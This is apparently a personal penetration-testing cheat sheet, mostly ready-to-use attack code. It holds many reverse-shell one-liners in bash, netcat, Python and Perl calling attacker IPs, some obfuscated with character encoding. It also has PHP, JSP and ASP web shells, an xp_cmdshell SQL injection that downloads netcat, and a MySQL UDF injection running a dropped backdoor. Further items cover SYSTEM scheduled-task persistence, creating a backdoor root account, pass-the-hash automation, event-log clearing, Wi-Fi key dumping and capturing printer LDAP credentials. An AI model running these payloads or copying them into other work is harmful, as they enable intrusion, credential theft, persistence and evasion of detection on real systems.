	schtasks /create /ru SYSTEM /sc MINUTE /MO 10 /tn persist /tr "\"C:\\windows\\system32\\rs_443.exe\""

Look for specific patches using wmic:
				wmic qfe | find "KB2709715"        -->  Searchs in the Update Lists for the patch KB2709715, if return is null, then exploit :D
				
				wmic qfe | find "KB3036220"


';exec master..xp_cmdshell '(echo open 192.168.18.84 21 && echo n3k && echo my_password && echo BIN && echo GET nc.exe && echo quit) > c:\inetpub\wwwroot\commands.txt';--


------------------------------------------------------------------
<?php
	$cmd = $_GET['cmd'];
	if(isset($cmd)) {
		system($cmd);
	}
?>

<html>
	<head>
		<meta http-equiv="Content-Type" content="text/html"; charset="iso-8859-1">
	</head>
	<body>
		<p> Enter Command </p>
			<form method="GET" id="searchform">
				<input type="text" name="cmd">
				<input type="submit" name="submit" value="submit">
			</form>
	</body>
</html>
------------------------------------------------------------------

To get better control of the shell when reverse shell comes in
	python -c 'import pty;pty.spawn("/bin/bash")'
	export TERM=linux

	echo os.system('/bin/bash')

	/bin/sh -i
	
-------------------------------------------------------------------

env
set
grep -rl phrase *

find /var/www -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
find / -perm +4000 -exec ls -la {} \; 2>/dev/null
find / -perm +2000 -exec ls -la {} \; 2>/dev/null
--------------------------------------------------------------------

Adding user root to Linux Box:

useradd -g root n3k -d /root -s /bin/bash
passwd n3k
cat /etc/passwd | sed "s_n3k\(.\)*_n3k:x:0:0:root:/root:/bin/bash_" > out

In the cases were we can't interact with the CLI:
	echo -e "my_password\nmy_password" | passwd n3k
	
echo -e 'my_password\\nmy_password' | passwd root

------------------------------------------------------------------

Reverse Shell PHP --> This was used in 404.php in the wordpress appearance template:

$sock=fsockopen("192.168.18.84",5555);exec("/bin/sh -i <&3 >&3 2>&3 &");

php -r '$sock=fsockopen("192.168.18.84",443);exec("/bin/sh -i <&3 >&3 2>&3");'


Is also very classic to spawn a shell using netcat:

    $ nc -e /bin/sh 10.0.0.1 1234
    
However, some versions of netcat do not support the -e flag, in which case the following command may
be used instead:

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
	
	telnet attackerip 4444 | /bin/bash | telnet attackerip 4445   # Remember to listen on your machine also on port 4445/tcp

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.18.84",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.18.84",6222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((str(186) + str(chr(46)) + str(138) + str(chr(46)) + str(102) + str(chr(46)) + str(192),4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([chr(47)+chr(98)+chr(105)+chr(110)+chr(47)+chr(115)+chr(104),chr(45)+chr(105)]);

	bash -i>& /dev/tcp/192.168.18.84/443 0>&1
	sh -i>& /dev/tcp/192.168.18.84/443 0>&1
	
	
There are sometimes you cannot write to the directory from which the website is being served... 

<?php system("echo 'import socket,subprocess,os,sys; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((sys.argv[1],int(sys.argv[2]))); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([sys.argv[3],sys.argv[4]]);' > /tmp/rs.py"); echo shell_exec("ls -ls /tmp"); system("python /tmp/rs.py 192.168.18.84 443 /bin/bash -i"); ?>


No quotes, no no spaces, python revshell:

socket=__import__(chr(115)+chr(111)+chr(99)+chr(107)+chr(101)+chr(116));subprocess=__import__(chr(115)+chr(117)+chr(98)+chr(112)+chr(114)+chr(111)+chr(99)+chr(101)+chr(115)+chr(115));os=__import__(chr(111)+chr(115));s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((str(192)+str(chr(46))+str(168)+str(chr(46))+str(191)+str(chr(46))+str(1),4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([chr(47)+chr(98)+chr(105)+chr(110)+chr(47)+chr(98)+chr(97)+chr(115)+chr(104),chr(45)+chr(105)]);

----------------------------------------------------------------------------
#!/usr/bin/python
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.18.84",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
----------------------------------------------------------------------------


Perl Reverse Shell For Linux:

perl -e 'use Socket;$i="192.168.18.84";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

--------------------------------------------------------------------------------------

Perl Reverse SHell For WIndows:
	
use IO::Socket;

my $c=new IO::Socket::INET->new(
	Proto => "tcp",
	PeerAddr => "192.168.18.84",
	PeerPort => "4444",
	)
	or die "cannot connect to remote host";

STDIN->fdopen($c,r);
$~->fdopen($c,w);
system$_ while<>;

------------------------------------------------------------------------------------------

JSP Shell

<%
if (request.getParameter("cmd") != null) {
out.println("Command: " +
request.getParameter("cmd") + "
");
Process p =
Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>


echo "<% if (request.getParameter(\"cmd\") != null) { out.println(\"Command: \" + request.getParameter(\"cmd\") + \" \"); Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr);disr = dis.readLine(); } } %>" | xxd -p


--------------------------------------------------------------------------------------------

Command ASP Shell           

<%
Dim oScript
' -- create COM -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
oScript.Run "\inetpub\ftproot\payload.exe"
Set oScript = Nothing
%>

-----------------------------------------------------------------------------------------

File Checking with uniscan:

	uniscan -u http://192.168.19.202/1/ -f /usr/share/dirb/wordlists/common.txt -w

Dirb for finding panels and stuff:

	dirb http://192.168.19.244:8000/
	
	
DETERMINE THE SERVICE BEHIND A PORT BY ANALYZING THE REQUESTS:

amap -d 192.168.19.244 8000
	
	
The correct syntax is as follows to copy all files including hidden dot files:
$ scp -rp /path/to/source/. user@server2:/path/to/dest/



Enable Remote desktop:
	reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable Remote Desktop:
	reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f


Nmap has a little-known feature called interactive mode, which grants the ability to not only
perform port scans without broadcasting your parameters to everyone logged into the system, but also
to execute shell commands.  Let's take a look at the nmap manpage:

    --interactive (Start in interactive mode) .
       Starts Nmap in interactive mode, which offers an interactive Nmap
       prompt allowing easy launching of multiple scans (either
       synchronously or in the background). This is useful for people who
       scan from multi-user systems as they often want to test their
       security without letting everyone else on the system know exactly
       which systems they are scanning. Use --interactive to activate this
       mode and then type h for help. This option is rarely used because
       proper shells are usually more familiar and feature-complete. This
       option includes a bang (!) operator for executing shell commands,
       which is one of many reasons not to install Nmap setuid root..

Of course, we're not going to listen to their advice.

    root@Wakari:~# chmod u+s /usr/bin/nmap
    root@Wakari:~# logout
    storm@Wakari:~$ nmap --interactive

    Starting Nmap V. 5.21 ( http://nmap.org )
    Welcome to Interactive Mode -- press h <enter> for help
    nmap> !sh
    # whoami
    root
	
	
	http://www.r00tsec.com/2012/11/howto-manual-pentest-windows-cheatsheet.html
	

When using base64 to encode a file.. the output is splited in lines which in most cases is not useful, so we need to trim those new lines from the output:

	base64 file.exe | tr -d "\n > output
	
	
	gpresult /z
	
	netsh diag show all
	
	
	netsh wlan show networks
	netsh wlan show profiles name="home"
	netsh wlan show profiles name="home" key=clear  --> shows saved credentials for network	
	netsh wlan export profile folder=. key=clear --> dumps all the saved networks into the current folder as XML files.
	
	netsh firewall show state
	
	Para desactivar el cortafuegos de Windows XP: 
		netsh firewall set opmode disable

	Para activar el cortafuegos de Windows XP: 
		netsh firewall set opmode enable
		
		
	netsh advfirewall firewall add rule name="445" dir=in action=allow protocol=TCP localport=445
	
	sc query --> asks for services complement to tasklist /svc
	sc qc servicename
	
	wevtutil el --> Lists the different log files the system is keeping
	wevtutil cl [LOGNAME] --> clear the content of the specified log (run as administrator)
	wevtutil qe [LOGNAME] --> Query events from a log (Read)
	
	
	ssh -f -N -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -R 6631:127.0.0.1:631 root@192.168.18.84 -p 443
	
	
	
        ---------------------------------------Automation scripts---------------------------------------
		
		
nmap -sS -p 139,445 --open -oG smb_machines.txt 192.168.19.200-254
export SMBHASH=3f4e8c5b017c14ebb62d51588342488a:1731ae043e02ab0e96e4edc5012eaac7
cat smb_machines.txt | grep "open" |cut -d" " -f2 | grep "192" | grep -v "201" | xargs -n1 -i pth-winexe -U Administrator% //{} cmd

-------------------------------------------

nmap -sS -p 135 --open -oG rpc_machines.txt
cat rpc_machines.txt | grep "open" | cut -d" " -f2 | grep "192" | xargs -n1 -i ./dcom_scanner {}

-------------------------------------------

nmap -sU --open -p 161,162 192.168.19.200-254 -oG snmp_machines.txt 

--------------------------------------------

Enumerate machines in the domain:

for i in $(seq 200 254); do dig PTR $i.19.168.192.in-addr.arpa @192.168.19.220; done | grep "3600 IN" | grep "PTR" | awk {'print $1" --> "$5'}


---------------------------------------------

Cracking with dictionaries:
 
locate wordlists | grep ".txt" > dictionaries.txt
cat dictionaries.txt | xargs -n1 -i john hashes_administrator.txt --wordlist={} --format=nt
cat dictionaries.txt | xargs -n1 -i john hashes_administrator.txt --wordlist={} --format=lm
cat dictionaries.txt | xargs -n1 -i john hashes_administrator.txt --wordlist={} --format=nt2

---------------------------------------------

Netcat port Scanning: sometimes better than nmap

for i in $(seq 1 65535); do nc -nv -w 1 -z 192.168.19.225 $i ; done

Replace the (seq ) with list like TOP-20-TCP-PORTS



------------------------------------------------------------------------------------------------------

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http is Nothing then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http is Nothing then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http is Nothing then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.close >> wget.vbs


Usage: cscript wget.vbs http://192.168.18.84/plink.exe plink.exe

------------------------------------------------------------------------------------

PowerShell FileTransfer method:

$storageDir = $pwd
$webclient = New-Object System.Net.WebClient
$url = "http://192.168.1.115/file.txt"
$file = "file.txt"
$webclient.DownloadFile($url,$file)

-------------------------------------------------------------------------------------

DEBUG Transfer method:

upx -9 nc.exe
locate exe2bat
wine exe2bat nc.exe nc.txt
head nc.txt


-------------------------------------------------------------------------------------
Going from regular user to a system user can be difficult if everything is properly locked down but going from an admin user to the system user is not that big of a deal. The sysinternals psexec.exe is another powerful tool every pentester should have in his tool bag. Using psexec as an admin user one can easily become the system user with the “-s” option so if you wanted a command prompt with system level privileges all you would have to do is run the following command.

c:\psexec.exe -s cmd.exe

-------------------------------------------------------------------------------------

MySQL will try to load the lib from where the PATH variable says to

/etc/ld.so.conf is the file which controls what lib paths are used by apps


MYSQL UDF INJECTION:

CREATE TABLE binfile ( id INT(4) NOT NULL AUTO_INCREMENT PRIMARY KEY, imgdata LONGBLOB);

insert into binfile values(1,load_file('/tmp/lib_mysqludf_sys.so'));
insert into binfile values(2,load_file('/tmp/bd'));

select imgdata from binfile where id="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
select imgdata from binfile where id="2" into dumpfile '/tmp/bd';

CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys:eval('/tmp/bd &');


------------------------------------------------------------------------------------------------------ 
 
Convert php code or anything to hexcode:

echo "<?php echo shell_exec($_GET['cmd']);?>" | xxd -p

<gr3x_> echo "<?php echo shell_exec(\$_GET['cmd']);?>" gives you <?php echo shell_exec($_GET['cmd']);?>
<gr3x_> try that
<gr3x_> after you get desired result, just pipe into xxd -p


To convert the hex back to ascii: xdd -p -r

echo "<?php echo shell_exec(\$_GET['cmd']);?>" | xxd -p | xxd -p -r


-------------------------------------------------------------------------------------------------------
Unicornscan:   ASYNC SCAN

/* HEAD HTTP */
		/*
		port src-port group
		*/
        tcp 80 -1 10 {
                "HEAD / HTTP/1.1\r\n\r\n"
        };

-m especifica el modo de conexión: 'U' -> udp ; 'T' -> tcp ; 'sf' -> tcp connect scan ; 'A' -> arp 
-G especifica el grupo

us -msf -G 10 x.x.x.x -p 80 


TCP-Connect Scan at 10 packets per second, Show [I]mmediately in [v]erbose mode
 unicornscan -msf -r10 -Iv 192.168.19.238
 
TCP-Connect Scan at 200 packets per second to all port range
 unicornscan -msf -r200 -Iv 192.168.19.214:1-65535

TCP-Connect Scan at 20 packets per second to 80,22,443,445,139,8080,25 at the whole network C class
 unicornscan -msf -r20 -Iv 192.168.19.0/24:80,22,443,445,139,8080,25
 
-----------------------------------------------------------------------------------------------------

More on pass the hash:

On older Windows systems (XP/2003) the local administrator account (also sometimes known as the 500 account) is created when the computer is stood up.  This account is used for administrative tasks, such as backups, patching, installing software, etc...  The hashes for this account are stored locally in the SAM database.  When the computer is added to a domain, this account remains and is still available for network logins.  Since admins are often lazy, many of these built-in admin accounts share the same password across multiple machines.  If one of these machines is compromised, and the local hashes are dumped out of the SAM, an attacker has now gained administrative access to potentially more machines on the network.  While  the attacker doesn't have privileged domain credentials, the local "system" account on these machines has access to the computer account for the domain.  This is sufficient to query the AD for more information, such as a list of users or groups.  This extra info leads to further attacks later.

Newer versions of Windows (2008/Vista / 7 ) by default disable the built-in administrator account  and instead creates an account that is in the "Administrators" group local to the machine.  This account can also be used to administer the workstation and its information is also stored in the SAM.  When the computer is added to the domain, by default (assuming UAC is enabled) these accounts are NOT accessible from the network.   So while the hashes provided could be cracked or recycled for other accounts, this information isn't as useful as it would be on older versions of Windows.  However, it is worth noting that this behavior can be overridden by registry settings or GPO settings, so beware.


-----------------------------------------

ICMP TimeStamp Request:

# hping3 --icmp --icmp-ts -V 12.29.20.124
using eth0, addr: 201.234.8.201, MTU: 1500
HPING 12.29.20.124 (eth0 12.29.20.124): icmp mode set, 28 headers + 0 data bytes
len=46 ip=12.29.20.124 ttl=57 id=16517 tos=0 iplen=40
icmp_seq=0 rtt=175.8 ms
ICMP timestamp: Originate=65365423 Receive=69168986 Transmit=69168986
ICMP timestamp RTT tsrtt=176

--- 12.29.20.124 hping statistic ---
7 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms


ICMP Address Mask Request:

hping3 -c 1 -V -1 -C 17 0daysecurity.com


MORE ON: http://0daysecurity.com/articles/hping3_examples.html

TCP Timestamp Packet:

# hping3 12.29.20.124 -p 443 -S --tcp-timestamp -c 1
HPING 12.29.20.124 (eth1 12.29.20.124): S set, 40 headers + 0 data bytes
len=56 ip=12.29.20.124 ttl=46 id=0 sport=443 flags=SA seq=0 win=5792 rtt=171.1 ms
  TCP timestamp: tcpts=2586349227


--- 12.29.20.124 hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 171.1/171.1/171.1 ms



TEST SSL Cipher List:

# openssl ciphers eNULL:ALL | tr ":" "\n" | xargs -n1 -i openssl s_client -starttls smtp -connect 208.189.92.32:25 -cipher {}


-----
Always have Pcredz monitoring while ARPing. Great for passive analysis on goal oriented pentests... CC parsing, SMB read/write extraction, imap, pop, mysql, & a lot more other credentials extractions. If you're not using it, you're losing some goodies.

https://github.com/lgandx/PCredz


Need creds on a local network? Found some printers with default creds?

1) Log into printer.
2) Look for LDAP configured.
3) Point the destination to your PC.
4) netcat -l -vv -p 444
5) Initiate an LDAP query.
6) Wait for creds!

+] Get domains from subdomain list:
# cat subdomains.txt | rev |  cut -d"." -f1,2 | rev | sort -u

+] Some s3 commands

C:\Users\yyy>aws s3 ls s3://inhouse.xxxx.com
                           PRE _sura/
2020-04-23 16:07:02          4 test.txt
2020-04-23 16:07:44          4 test2.txt
2020-04-23 18:05:17         15 test3.txt

C:\Users\yyy>aws s3api get-bucket-acl --bucket inhouse.xxxx.com
{
    "Owner": {
        "DisplayName": "ib-brandedcontent",
        "ID": "f61fd3f79814e2d1dd84b6e987a17befa51a10d7b474d40c16476caffc0be3ff"
    },
    "Grants": [
        {
            "Grantee": {
                "DisplayName": "ib-brandedcontent",
                "ID": "f61fd3f79814e2d1dd84b6e987a17befa51a10d7b474d40c16476caffc0be3ff",
                "Type": "CanonicalUser"
            },
            "Permission": "FULL_CONTROL"
        },
        {
            "Grantee": {
                "Type": "Group",
                "URI": "http://acs.amazonaws.com/groups/global/AllUsers"
            },
            "Permission": "FULL_CONTROL"
        }
    ]
}

C:\Users\x>aws s3 cp test4.html s3://inhouse.xxxx.com
upload: .\test4.html to s3://inhouse.xxxx.com/test4.html


aws s3api put-object-acl --bucket inhouse.xxxx.com --key test4.html --acl public-read